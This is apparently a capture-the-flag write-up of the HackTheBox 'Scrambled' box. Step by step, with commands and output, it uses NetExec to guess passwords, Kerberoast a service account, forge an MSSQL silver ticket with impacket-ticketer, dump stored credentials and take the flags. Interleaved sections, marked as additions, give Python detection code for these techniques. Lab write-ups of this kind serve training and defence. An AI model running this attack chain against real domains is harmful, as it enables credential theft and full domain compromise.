@mpgn
Last active April 23, 2024 03:03
Scrambled vs NetExec for fun and profit by @mpgn_x64

Scrambled vs NetExec

Let's pwn the box Scrambled from HackTheBox using only NetExec! For context, I was reading the Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup that was true, but not anymore: it's pretty simple with NXC, 5 minutes and you get root :)

Note: I will skip the web part, where we get one username: ksimpson

1. Getting domain info

netexec ldap 10.10.11.168
LDAP        10.10.11.168    389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
  • Target: DC1.scrm.local
  • Domain: scrm.local

We can now update our /etc/hosts file with DC1.scrm.local.

2. Check if the user ksimpson exists

netexec ldap DC1.scrm.local -u ksimpson -p blabla     
LDAP        dc1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP        dc1.scrm.local  389    DC1.scrm.local   [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED

# with kerberos
netexec ldap DC1.scrm.local -u ksimpson -p blabla -k  
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP        DC1.scrm.local  389    DC1.scrm.local   [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED

KDC_ERR_PREAUTH_FAILED => means we have a valid username but a bad password! Let's try login = password ;) Also, you may have noticed the STATUS_NOT_SUPPORTED without the Kerberos option: it means NTLM is disabled on the domain, no big deal for NXC ;)
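What this probing looks like from the domain controller's side, as an added example that is not part of the gist: the KDC answers a wrong password for an existing user with KDC_ERR_PREAUTH_FAILED (logged as Event 4771, failure code 0x18) and an unknown user with client-principal-unknown (Event 4768, result code 0x6), so grouping those two codes by source address separates username enumeration from password guessing. The event records below are constructed samples with simplified field names.

```python
# Added example (not from the gist): triage constructed DC Kerberos events to
# spot the username probing and password guessing described above.
#   Event 4768, Result Code 0x6   = client principal unknown (user does not exist)
#   Event 4771, Failure Code 0x18 = pre-authentication failed (wrong password)
from collections import defaultdict

# Constructed sample events, as a SIEM might export them (not real logs).
SAMPLE_EVENTS = [
    {"id": 4768, "user": "jdoe",     "ip": "10.10.14.5", "code": "0x6"},
    {"id": 4768, "user": "admin2",   "ip": "10.10.14.5", "code": "0x6"},
    {"id": 4771, "user": "ksimpson", "ip": "10.10.14.5", "code": "0x18"},
    {"id": 4771, "user": "ksimpson", "ip": "10.10.14.5", "code": "0x18"},
    {"id": 4768, "user": "ksimpson", "ip": "10.10.14.5", "code": "0x0"},   # success afterwards
    {"id": 4771, "user": "bob",      "ip": "10.1.1.20",  "code": "0x18"},  # one typo, normal
]

def triage(events, unknown_threshold=2, preauth_threshold=2):
    """Per-source findings: which unknown users were probed and how many
    pre-auth failures occurred. Thresholds are assumed tuning knobs."""
    unknown = defaultdict(set)    # ip -> usernames that do not exist
    preauth = defaultdict(list)   # ip -> usernames with a wrong password
    for e in events:
        if e["id"] == 4768 and e["code"] == "0x6":
            unknown[e["ip"]].add(e["user"])
        elif e["id"] == 4771 and e["code"] == "0x18":
            preauth[e["ip"]].append(e["user"])
    findings = {}
    for ip in set(unknown) | set(preauth):
        tags = []
        if len(unknown[ip]) >= unknown_threshold:
            tags.append("username-enumeration")
        if len(preauth[ip]) >= preauth_threshold:
            tags.append("password-guessing")
        if tags:
            findings[ip] = {
                "tags": tags,
                "unknown_users": sorted(unknown[ip]),
                "preauth_failures": len(preauth[ip]),
            }
    return findings

if __name__ == "__main__":
    for ip, f in triage(SAMPLE_EVENTS).items():
        print(ip, f)
```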

3. Checking ksimpson password

netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\ksimpson

4. Enumerate shares

netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\ksimpson:ksimpson 
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] Enumerated shares
SMB         DC1.scrm.local  445    DC1.scrm.local   Share           Permissions     Remark
SMB         DC1.scrm.local  445    DC1.scrm.local   -----           -----------     ------
SMB         DC1.scrm.local  445    DC1.scrm.local   ADMIN$                          Remote Admin
SMB         DC1.scrm.local  445    DC1.scrm.local   C$                              Default share
SMB         DC1.scrm.local  445    DC1.scrm.local   HR                              
SMB         DC1.scrm.local  445    DC1.scrm.local   IPC$            READ            Remote IPC
SMB         DC1.scrm.local  445    DC1.scrm.local   IT                              
SMB         DC1.scrm.local  445    DC1.scrm.local   NETLOGON        READ            Logon server share 
SMB         DC1.scrm.local  445    DC1.scrm.local   Public          READ            
SMB         DC1.scrm.local  445    DC1.scrm.local   Sales                           
SMB         DC1.scrm.local  445    DC1.scrm.local   SYSVOL          READ            Logon server share

The user can read the "Public" share.

5. Check files inside Public

netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\ksimpson:ksimpson 
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        DIR: ['print$']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]       SIZE: 51200
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]     OUTPUT: /tmp/nxc_spider_plus

cat /tmp/nxc_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6
    "Public": {
        "Network Security Changes.pdf": {
            "atime_epoch": "2021-11-04 18:23:11",
            "ctime_epoch": "2021-11-04 18:20:49",
            "mtime_epoch": "2021-11-05 13:45:07",
            "size": "615.34 KB"
        }

There is one file, "Network Security Changes.pdf", so let's get it :)

6. Getting the file "Network Security Changes.pdf" from the "Public" share:

netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public" 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\ksimpson:ksimpson 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] File Network Security Changes.pdf was transferred to /tmp/Network_Security_Changes.pdf

7. Get Kerberoastable users

netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\ksimpson 
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [*] Total of records returned 2
LDAPS       DC1.scrm.local  636    DC1.scrm.local   sAMAccountName: sqlsvc memberOf:  pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547
LDAPS       DC1.scrm.local  636    DC1.scrm.local   $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$d7519a37a494d59bb728c38677203f9a765440ccc6ab7105f5431c12dc17574fa164bbba88922216d9f2d2b717b7761b7ec449ddcf55b1578807e7d34b97fc1094b68db8ccd8356aa605d6d416cafa0fed51824009008034920a1251bd7f2e1405627f95ebffbbd7863cb7251f581bfdd7128854e6443e1d320af65d263cd6eec7d451b87e80ff611b07cc6fed0fc21b31c6f06a28ac78053c8ad023b4e45c01b8ba196eea2ae4d2e32a575cca0c0b2e25164f4e5b4457c4f630ef4c9d33d1b733dfe32e23548b14afe7748c96011eba7bf3a8bbaf2db500a1e8ffbd4927561969183b3b37ec99400c9e856852b6a62e3580b6129789c96ea8f5df0bb11fc10fd4de7ae0993ec17dd8c967b9cc130fe4aedb33df2a7b6e67816854bda58a3ea4e360ffd0499d54a984a6130dffea7241d8ced5e345ad0e8968b4ff1725825572c5a489ff77d912ed6a9f5dd4bff35e0299cb3b9ad665227d0f104de22bd395a2995c0692286d394e49e6eec1e4db89956c6049b60f697bdbab91eb1b232f047939744bd6b595d396d9a44af7b6dde719a0a1634463217e87137cb90b2cfd0b573406ea25b7c0bddc18a00981e0c84093f29da9f55573e480e7247de386c478345555911362c9de7a2460b0a593f178e125b3c50d376d3f6caadcf78a3493c100f007013923b8d6a13b04b5c44016c4ab36de56030a615d15d22c54b30f4952c5ddcf7b44b792033a3c1dfab7c1d2b5844af0f7e72449fc4cb1fe32a00fc61e77be03cd5dfbcb54e96d7f8cef7826a1ec1f533aef967796e57593cf762b819065b31a99c863f2c36076d62dc0eb6051261ecd5a940ab888ae8fc95dc09c4c3ca0173b414e338699749c7918a89928af702b9ed3a74721adb34c32a3f75a60660ddc0056734da74b824375f3c7cc743332f355955bee4f7dde448d2517ab68dcb8a4a34db2f802cfd98e3eee29bafc8937b99ee0da35c96be4ae77b03bc68b38b6f3b0f010dcaa8a9820ecdc9d86b2e7c111bcfbe9c9df93e0b21283d8b0630dee59dfbb9cfdbf464c18253081aa8832d79756d7bce6a7a0c597cba7b434a078edf70b8c6d774dc3a48761ecad0d391d787360ca33537b8ae3f4d763996f7edb7249d52ccd5fb9d465b7e088c1db7383ba963013c00bfa5c912b8a9d2b432613e68e7b331d1334494dfe57356203e1a3b7b1af1e84fcf56196e48dfd651ae6cb4932d4e057ad288dbf64cbf63490cad7cf427f3ba69066c1f9d597e61cbd9025833c91884a5d6b449ca54a9a75f43f0ebc1bcc0748c70d62e390083f022241cde53a3b056bf
c78f245ef08674862d97ca2f7d9ca7b43f4554defceb80f1fe6dbd33ce27da7231ca8376bc5372f2a9e9be07001763850569a0aba4f82d663e1677ec20aec8bda13bda2b8994a7b24d369092e594fbfd23857f7405f08

# checking creds after cracking with Hashcat
netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k                   
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\sqlsvc
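The defender's view of step 7, as an added example that is not part of the gist: the `$krb5tgs$23$` prefix on the hash above is encryption type 23 (RC4-HMAC), which the DC logs in Event 4769 as Ticket Encryption Type 0x17. Service tickets requested with RC4 for user accounts (service names without a trailing `$`), especially several of them from one requester, are the classic Kerberoasting signature; the fix on the account side is a long random password or a gMSA, since "Pegasus60" fell to Hashcat. The 4769 records below are constructed samples with simplified field names.

```python
# Added example (not from the gist): flag RC4 service-ticket requests for user
# service accounts in constructed Event 4769 records.
#   Ticket Encryption Type 0x17 = RC4-HMAC (etype 23), 0x12 = AES256-CTS-HMAC-SHA1
from collections import defaultdict

RC4 = "0x17"

# Constructed sample 4769 events (not real logs).
SAMPLE_4769 = [
    {"account": "ksimpson@SCRM.LOCAL", "ip": "10.10.14.5", "service": "sqlsvc",    "etype": RC4},
    {"account": "ksimpson@SCRM.LOCAL", "ip": "10.10.14.5", "service": "backupsvc", "etype": RC4},
    {"account": "ksimpson@SCRM.LOCAL", "ip": "10.10.14.5", "service": "websvc",    "etype": RC4},
    {"account": "jdoe@SCRM.LOCAL",     "ip": "10.1.1.20",  "service": "DC1$",      "etype": "0x12"},
    {"account": "jdoe@SCRM.LOCAL",     "ip": "10.1.1.20",  "service": "sqlsvc",    "etype": "0x12"},
]

def kerberoast_candidates(events, min_services=1):
    """Group RC4 ticket requests for user (non-$) service accounts by requester.
    Returns {(account, ip): sorted service accounts}; krbtgt and computer
    accounts are skipped because their keys are not crackable passwords."""
    hits = defaultdict(set)
    for e in events:
        svc = e["service"]
        if e["etype"] != RC4 or svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits[(e["account"], e["ip"])].add(svc)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_services}

def rc4_ratio(events):
    """Share of service-ticket requests still using RC4; a tracking metric for
    the migration to AES-only service accounts."""
    if not events:
        return 0.0
    return sum(e["etype"] == RC4 for e in events) / len(events)

if __name__ == "__main__":
    print(kerberoast_candidates(SAMPLE_4769))
    print(f"RC4 share of TGS requests: {rc4_ratio(SAMPLE_4769):.0%}")
```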

8. Trying to connect to MSSQL

netexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k
MSSQL       DC1.scrm.local  1433   None             [*] None (name:DC1.scrm.local) (domain:scrm.local)
MSSQL       DC1.scrm.local  1433   None             [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc'

The user cannot connect to MSSQL (very strange, but I guess it is on purpose so we exploit a Kerberos Silver Ticket, which is very cool!)

9. Getting the SID of the domain:

netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
LDAP        DC1.scrm.local  389    DC1.scrm.local   [*]  x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS       DC1.scrm.local  636    DC1.scrm.local   [+] scrm.local\sqlsvc 
LDAPS       DC1.scrm.local  636    DC1.scrm.local   Domain SID S-1-5-21-2743207045-1827831105-2542523200

Notice the automatic switch between LDAP and LDAPS! :D

10. We generate a ticket and use it with the --use-kcache option

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator 
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

export KRB5CCNAME=administrator.ccache
netexec mssql DC1.scrm.local --use-kcache  
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)
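How a defender can spot the ticket from step 10, as an added example that is not part of the gist: a silver ticket is forged offline from the service account's key and handed straight to the service, so the KDC never issues it and the DC records no Event 4769 for it, while the MSSQL host still records a Kerberos network logon (Event 4624, Logon Type 3, authentication package Kerberos). Correlating the two streams surfaces logons no ticket request explains. Both event lists are constructed samples with simplified field names.

```python
# Added example (not from the gist): find host Kerberos logons with no
# matching service-ticket request on the DC, the silver-ticket footprint.
from datetime import datetime, timedelta

DC_4769 = [  # constructed: one legitimate ticket request for sqlsvc by jdoe
    {"time": "2024-04-23 10:00:05", "account": "jdoe@SCRM.LOCAL", "service": "sqlsvc"},
]
HOST_4624 = [  # constructed: network logons recorded on the SQL host
    {"time": "2024-04-23 10:00:07", "account": "jdoe",          "package": "Kerberos", "logon_type": 3, "ip": "10.1.1.20"},
    {"time": "2024-04-23 10:05:00", "account": "administrator", "package": "Kerberos", "logon_type": 3, "ip": "10.10.14.5"},
    {"time": "2024-04-23 10:06:00", "account": "svc_backup",    "package": "NTLM",     "logon_type": 3, "ip": "10.1.1.30"},
]

def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")

def orphan_kerberos_logons(host_logons, dc_tgs, service="sqlsvc", window=timedelta(minutes=10)):
    """Kerberos network logons on the host that no DC ticket request explains.

    A logon is explained when the same user requested a ticket for `service`
    on the DC at most `window` before it. Everything else is returned as
    (account, source ip): a forged ticket, or a gap in DC log collection."""
    orphans = []
    for logon in host_logons:
        if logon["package"] != "Kerberos" or logon["logon_type"] != 3:
            continue
        t = _ts(logon["time"])
        user = logon["account"].lower()
        explained = any(
            tgs["service"].lower() == service
            and tgs["account"].split("@")[0].lower() == user
            and timedelta(0) <= t - _ts(tgs["time"]) <= window
            for tgs in dc_tgs
        )
        if not explained:
            orphans.append((logon["account"], logon["ip"]))
    return orphans

if __name__ == "__main__":
    print(orphan_kerberos_logons(HOST_4624, DC_4769))
```

Rotating the service account's password (here sqlsvc) invalidates every ticket forged with the old key, which is the immediate containment step once such a logon is confirmed.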

11. Execute MSSQL query

netexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;"
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)
MSSQL       dc1.scrm.local  1433   NONE             LdapUser
MSSQL       dc1.scrm.local  1433   NONE             LdapPwd
MSSQL       dc1.scrm.local  1433   NONE             --------------------------------------------------
MSSQL       dc1.scrm.local  1433   NONE             --------------------------------------------------
MSSQL       dc1.scrm.local  1433   NONE             MiscSvc
MSSQL       dc1.scrm.local  1433   NONE             ScrambledEggs9900

# checking new creds
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k                                                                                                            
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900

We got a new user:

  • User: MiscSvc
  • Password: ScrambledEggs9900

12. Getting the user flag (user.txt)

netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt                                        
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)
MSSQL       dc1.scrm.local  1433   NONE             [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt
MSSQL       dc1.scrm.local  1433   NONE             [+] File c:\\users\\miscsvc\\desktop\\user.txt was transferred to /tmp/user.txt

12.bis Getting the root flag (unintended solution???)

netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt
MSSQL       dc1.scrm.local  1433   NONE             [*]  (name:) (domain:)
MSSQL       dc1.scrm.local  1433   NONE             [+] \ from ccache (Pwn3d!)
MSSQL       dc1.scrm.local  1433   NONE             [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt
MSSQL       dc1.scrm.local  1433   NONE             [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt
                                                                                                                                                                                                                                                                       
cat /tmp/root.txt                                                                                                               
936c171e740f3009a405919f03a05644

We have the root flag, but it seems that is not the end, so let's go on for the fun :)

13. Getting readable shares for user miscsvc

netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares                       
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] Enumerated shares
SMB         DC1.scrm.local  445    DC1.scrm.local   Share           Permissions     Remark
SMB         DC1.scrm.local  445    DC1.scrm.local   -----           -----------     ------
SMB         DC1.scrm.local  445    DC1.scrm.local   ADMIN$                          Remote Admin
SMB         DC1.scrm.local  445    DC1.scrm.local   C$                              Default share
SMB         DC1.scrm.local  445    DC1.scrm.local   HR                              
SMB         DC1.scrm.local  445    DC1.scrm.local   IPC$            READ            Remote IPC
SMB         DC1.scrm.local  445    DC1.scrm.local   IT              READ            
SMB         DC1.scrm.local  445    DC1.scrm.local   NETLOGON        READ            Logon server share 
SMB         DC1.scrm.local  445    DC1.scrm.local   Public          READ            
SMB         DC1.scrm.local  445    DC1.scrm.local   Sales                           
SMB         DC1.scrm.local  445    DC1.scrm.local   SYSVOL          READ            Logon server share 

14. List the files inside the IT share

SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        DIR: ['netlogon', 'public', 'sysvol', 'ipc$']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]        EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]       SIZE: 51200
SPIDER_P... DC1.scrm.local  445    DC1.scrm.local   [*]     OUTPUT: /tmp/nxc_spider_plus
                                                                                                                                                                                                                                                                                  
cat /tmp/nxc_spider_plus/DC1.scrm.local.json
{
   "IT": {
       "Apps/Sales Order Client/ScrambleClient.exe": {
           "atime_epoch": "2021-11-05 16:57:06",
           "ctime_epoch": "2021-11-05 16:47:10",
           "mtime_epoch": "2021-11-05 16:57:08",
           "size": "84.5 KB"
       },
       "Apps/Sales Order Client/ScrambleLib.dll": {
           "atime_epoch": "2021-11-05 16:57:06",
           "ctime_epoch": "2021-11-05 16:47:10",
           "mtime_epoch": "2021-11-05 16:57:08",
           "size": "19 KB"
       }
   }
}                        
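A parser for the spider_plus JSON shown in steps 5 and 14, as an added example that is not part of the gist or of NetExec: it flattens the share/path/metadata layout into a per-share inventory with sizes in bytes and picks out file types worth reviewing on a share a low-privileged account can read (here executables on IT). The sample document is constructed in the same layout as the two outputs above; converting sizes with a 1024-based unit is an assumption about how spider_plus formats them.

```python
# Added example (not from the gist): flatten NetExec spider_plus JSON output
# into a share inventory that can be audited for over-exposed files.
import json
import re

# Constructed sample in the layout spider_plus writes (share -> path -> metadata).
SAMPLE_JSON = """{
  "IT": {
    "Apps/Sales Order Client/ScrambleClient.exe": {"atime_epoch": "2021-11-05 16:57:06", "ctime_epoch": "2021-11-05 16:47:10", "mtime_epoch": "2021-11-05 16:57:08", "size": "84.5 KB"},
    "Apps/Sales Order Client/ScrambleLib.dll":    {"atime_epoch": "2021-11-05 16:57:06", "ctime_epoch": "2021-11-05 16:47:10", "mtime_epoch": "2021-11-05 16:57:08", "size": "19 KB"}
  },
  "Public": {
    "Network Security Changes.pdf": {"atime_epoch": "2021-11-04 18:23:11", "ctime_epoch": "2021-11-04 18:20:49", "mtime_epoch": "2021-11-05 13:45:07", "size": "615.34 KB"}
  }
}"""

_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}  # assumed 1024-based

def size_to_bytes(text):
    """'615.34 KB' -> 630108; raises on anything that is not '<number> <unit>'."""
    m = re.fullmatch(r"\s*([\d.]+)\s*([KMG]?B)\s*", text)
    if not m:
        raise ValueError(f"unparseable size: {text!r}")
    return int(round(float(m.group(1)) * _UNITS[m.group(2)]))

def inventory(raw):
    """{share: [(path, size_bytes, mtime), ...]} sorted by path within each share."""
    data = json.loads(raw)
    return {
        share: sorted((path, size_to_bytes(meta["size"]), meta["mtime_epoch"])
                      for path, meta in files.items())
        for share, files in data.items()
    }

def files_with_ext(inv, exts):
    """(share, path) pairs whose extension is in `exts`, e.g. {'exe', 'dll'}."""
    exts = {e.lower() for e in exts}
    return [(share, path)
            for share, items in inv.items()
            for path, _, _ in items
            if "." in path and path.rsplit(".", 1)[1].lower() in exts]

if __name__ == "__main__":
    inv = inventory(SAMPLE_JSON)
    for share, items in inv.items():
        print(share, sum(size for _, size, _ in items), "bytes in", len(items), "file(s)")
    print(files_with_ext(inv, {"exe", "dll"}))
```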

15. Getting the two files

crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900  -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleClient.exe' /tmp/file.exe --share "IT"
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe

netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900  -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT"
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] scrm.local\MiscSvc:ScrambledEggs9900 
SMB         DC1.scrm.local  445    DC1.scrm.local   [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll
SMB         DC1.scrm.local  445    DC1.scrm.local   [+] File Apps/Sales Order Client/ScrambleLib.dll was transferred to /tmp/file.dll

For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => the "ScrambleClient Reverse" part!

That's all from me, I hope you learned a bit more about NetExec. For the latest news follow me on Twitter => @mpgn_x64, and follow @0xdf_ for the HTB writeup :)
